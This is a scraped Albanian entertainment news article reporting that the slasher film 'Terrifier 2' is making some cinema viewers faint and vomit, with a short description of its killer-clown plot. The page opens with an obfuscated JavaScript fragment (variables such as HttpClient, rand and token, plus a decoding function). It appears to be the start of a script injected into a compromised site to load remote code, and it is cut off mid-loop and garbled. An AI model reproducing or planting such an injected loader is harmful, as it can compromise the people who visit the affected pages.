;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ky film është aq shqetësues sa njerëzit po humbin ndjenjat nëpër kinema

By

Fenomemi më i ri  kinema është ‘Terrifier 2’, filmi slasher me regji të Damien Leone që po provokon atë që shumë pak filma bëjnë te shikuesi: të vjellat.

Terrifier 2' Opens In 850 Theaters Amid Recent Horror Movie Successes

Zakonisht, filmat horror i mbajnë shikuesit zgjuar natën, por ‘Terrifier 2’ është ndryshe dhe është bërë virale, pasi skenat e tij janë aq grafike, saqë disa shikuesve po i bien të fikët dhe të vjella në sediljet e tyre.

Në rrjetet sociale, disa pjesëmarrës të premierës speciale të filmit ndanë përvojat e tyre rreth këtij filmi indie, i cili do të shfaqet në më shumë se 850 kinema në mbarë vendin dhe është një vazhdim i Terrifier (2016), historia e të cilit sillet rreth një kllouni vrasës psikotik të quajtur Art Kllouni.

Në ‘Terrifier 2’, ky personazh rikthehet në jetë nga një entitet i keq, duke terrorizuar një vajzë adoleshente dhe vëllain e saj në mes të Halloween. Shumë e konsiderojnë si një lloj ‘IT’, por më agresive, plot gjak dhe sekuenca ekstreme. Në fakt, dhuna e filmit është ajo që e ka bërë atë një fenomen viral. /Prive.al

Artikuj të ngjashëm